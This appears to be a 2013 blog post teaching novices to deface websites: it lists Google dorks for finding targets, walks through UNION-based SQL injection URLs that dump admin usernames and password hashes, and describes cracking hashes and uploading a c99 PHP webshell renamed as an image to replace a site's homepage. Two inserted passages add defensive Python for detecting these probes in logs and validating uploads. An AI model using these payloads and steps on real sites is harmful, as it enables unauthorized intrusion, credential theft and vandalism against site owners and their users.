Friday 22 February 2013

How to deface a website

How To Hack a Website With SQL Injection: Full Tutorial
I'm posting this here because this tut explains everything step by step, but most of the SQL tuts end when we find the password hash, so newbies don't know what to do after that. In this tut I'm going to explain how to deface a website from scratch; I hope you will find this useful.
If you find this tut useful, please post a comment.
1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD

First we must find our target website. To do that you can use these "dorks". I'll give some dorks here; copy any one of them, paste it in Google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
You can find lots of dorks here (use them without the " " marks):
Code:
Click Here To Download
1). Check for vulnerability

Let's say that we have some site like this:
http://www.site.com/news.php?id=5
Now, to test if it is vulnerable, we add a ' (quote) to the end of the URL, and that would be:
http://www.site.com/news.php?id=5'
If we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar, that means it is vulnerable to SQL injection.
2). Find the number of columns

To find the number of columns we use the statement ORDER BY (it tells the database how to order the result). So how do we use it? Just keep incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)
That means it has 3 columns, because we got an error on 4.
3). Check for UNION function

With UNION we can select more data in one SQL statement. So we have:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
(we already found that the number of columns is 3 in section 2).)
If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works.
4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try -- instead. It's a comment and it's important for our query to work properly.
Let's say that we have number 2 on the screen. Now to check the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this:
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ...": I didn't see any paper covering this problem, so I must write it. What we need is the convert() function, i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex(), i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version.
5). Getting table and column name

Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe the method for MySQL > 5.
We must guess table and column names in most cases. Common table names are: user/s, admin/s, member/s ... Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e. it would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good.) We know that table admin exists...
Now to check column names:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
(if you get an error, then try the other column names)
We get the username displayed on screen; an example would be admin, or superadmin etc...
Now to check if the column password exists:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column names)
We see the password on the screen as a hash or in plain text; it depends on how the database is set up, i.e. MD5 hash, MySQL hash, SHA1...
Now we must complete the query to look nice. For that we can use the concat() function (it joins strings), i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for colon).
(There is another way for that, char(58), the ASCII value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser.
If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so an example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6). MySQL 5

Like I said before, I'm going to explain how to get table and column names in MySQL > 5.
For this we need information_schema. It holds all tables and columns in the database.
To get tables we use table_name and information_schema.tables, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1 (get 1 result starting from the 0th).
Now to view the second table, we change limit 0,1 to limit 1,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed. For the third table we put limit 2,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same. Here we use column_name and information_schema.columns; the method is the same as above, so an example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed. For the second one we change limit 0,1 to limit 1,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd etc...
If you want to display the column names for a specific table, use this query (WHERE clause). Let's say that we found table users, i.e.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get the column names of table users displayed. Just using LIMIT we can list all columns in table users.
Note that this won't work if magic quotes is ON.
Let's say that we found columns user, pass and email. Now to complete the query and put them all together we use concat(); I described it earlier. i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
What we get here is user:pass:email from table users. Example:
admin:hash:whatever@blabla.com
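From the defender's side, the probe sequence walked through in steps 1 to 6 leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of the original tutorial: it parses constructed Apache-style log lines (the IPs, timestamps and requests are made up for illustration) and flags clients whose requests carry the quote test, ORDER BY counting, UNION SELECT, comment terminators or information_schema enumeration described above.

```python
"""Flag the UNION-based SQL injection probing sequence in access logs.
Added example (not from the original post); all log lines are constructed."""
import re
from urllib.parse import unquote_plus

# One regex per probing step described in the tutorial.
PATTERNS = {
    "quote_probe": re.compile(r"=\d+'(?:\s|$|&|/\*|--)"),
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "comment_tail": re.compile(r"(?:/\*|--)\s*(?:&|$)"),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)|mysql\.user", re.I),
    "version_probe": re.compile(r"@@version|\bversion\(\)", re.I),
}

# Common Log Format: ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3})'
)

# Constructed sample: one client replaying the tutorial's steps, one normal visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Feb/2013:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4312',
    '203.0.113.7 - - [22/Feb/2013:10:00:05 +0000] "GET /news.php?id=5%27 HTTP/1.1" 500 812',
    '203.0.113.7 - - [22/Feb/2013:10:00:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 812',
    '203.0.113.7 - - [22/Feb/2013:10:00:14 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 4330',
    '203.0.113.7 - - [22/Feb/2013:10:00:20 +0000] "GET /news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 4330',
    '198.51.100.4 - - [22/Feb/2013:10:01:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4100',
]

def classify(line):
    """Parse one log line; return (ip, decoded_url, [matched pattern names]) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote_plus(m.group("url"))  # decode %27, %20 etc. before matching
    hits = [name for name, rx in PATTERNS.items() if rx.search(url)]
    return m.group("ip"), url, hits

def suspicious_ips(lines, threshold=2):
    """Collect the distinct probe types per client IP and report those that reach
    `threshold`. A lone quote may be a typo; ORDER BY counting followed by a
    UNION SELECT is the signature of the walkthrough above."""
    seen = {}
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, _, hits = parsed
        seen.setdefault(ip, set()).update(hits)
    return {ip: sorted(h) for ip, h in seen.items() if len(h) >= threshold}

if __name__ == "__main__":
    for ip, probes in suspicious_ips(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(probes)}")
```

The same patterns can be fed to a WAF or SIEM rule; correlating several distinct probe types per client, rather than alerting on any single one, keeps the false-positive rate down.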
** If you are too lazy for doing the above stuff you can use tools; they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
Code:
Click Here To Download
2) SQLi helper (this tool will do all the injecting job and get you the pass or hash)
Code:
Click Here To Download
*** Use the tools only if you are new to hacking. Do it manually; that's the thrill and that is real hacking. When you do it manually you will understand the concept.
In some websites you can directly see the password, but most of the websites encrypt them using MD5, so you have to crack the hash to get the password. To crack the password there are three ways:
1) check the net whether this hash has been cracked before:
Code:
Click Here To Download
2) crack the password with the help of a site:
Code:
Click Here To Download
Click Here To Download
3) use MD5 cracking software:
Code:
Click Here To Download
Password = OwlsNest
2) DEFACING THE WEBSITE

After getting the password you can log in as the admin of the site. But first you have to find the admin login page for the site. There are three methods to find the admin panel.
1) you can use an admin finder website:
Code:
Click Here To Download
2) you can use admin finder software:
Code:
Click Here To Download
After logging in as the admin you can upload photos to the site. So now you are going to upload a shell into the site using this upload facility. Download the shell here (shells are PHP scripts which affect websites, so it will be detected as a trojan, but no need to worry, I take the responsibility):
Code:
Click Here To Download
Extract it; you will get a c99.php. Upload it.
Some sites won't allow you to upload a PHP file, so rename it as c99.php.gif, then upload it.
After that go to http://www.site.com/images (in most sites images are saved in this dir, but if you can't find c99 there then you have to guess the dir).
Find the c99.php;.gif and click it. Now you can see a big control panel. Now you can do whatever you want to do.
Search for the index.html file and replace it with your own file, so if anyone goes to that site they will see your page.
After doing this click logout. That's it, you are done.
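The upload step above only works because the server accepts c99.php.gif as an image and later serves it as PHP. As an added example (not code from the post; the allow-list policy is a standard mitigation rather than anything the page describes), this Python function shows the checks an upload handler needs to refuse that file: reject an executable-looking extension segment anywhere in the name, require the file's leading bytes to match the declared image type, and store it under a server-generated name.

```python
"""Image-upload validation that refuses renamed webshells such as c99.php.gif.
Added example; the checks below are a generic hardening policy, not the post's code."""
import os
import re
import secrets

# Allowed image types: extension -> acceptable leading bytes (magic numbers).
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# An executable extension anywhere in the name is rejected, not just at the end:
# servers with multi-extension handling can run "c99.php.gif" or "c99.php;.gif" as PHP.
EXEC_SEGMENTS = re.compile(r"\.(?:php\d?|phtml|phar|cgi|pl|asp|aspx|jsp)(?:[.;]|$)", re.I)
# A PHP open tag inside otherwise valid image data is still refused, so the file
# cannot be executed later through an include() of the image path.
PHP_MARKER = re.compile(rb"<\?(?:php\b|=)", re.I)

def validate_upload(filename, data):
    """Return (accepted, reason, stored_name). The stored name is generated server-side,
    so the client-supplied name never reaches the filesystem."""
    base = os.path.basename(filename.replace("\\", "/"))
    if EXEC_SEGMENTS.search(base):
        return False, "executable extension segment in filename", None
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not in allow-list", None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared image type", None
    if PHP_MARKER.search(data):
        return False, "PHP tag embedded in image data", None
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    for name, blob in [("c99.php.gif", b"GIF89a"), ("photo.gif", b"GIF89a" + b"\x00" * 8)]:
        print(name, validate_upload(name, blob))
```

Serve the upload directory with script execution disabled (and ideally from outside the document root) so that even a check that is bypassed does not hand out code execution.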
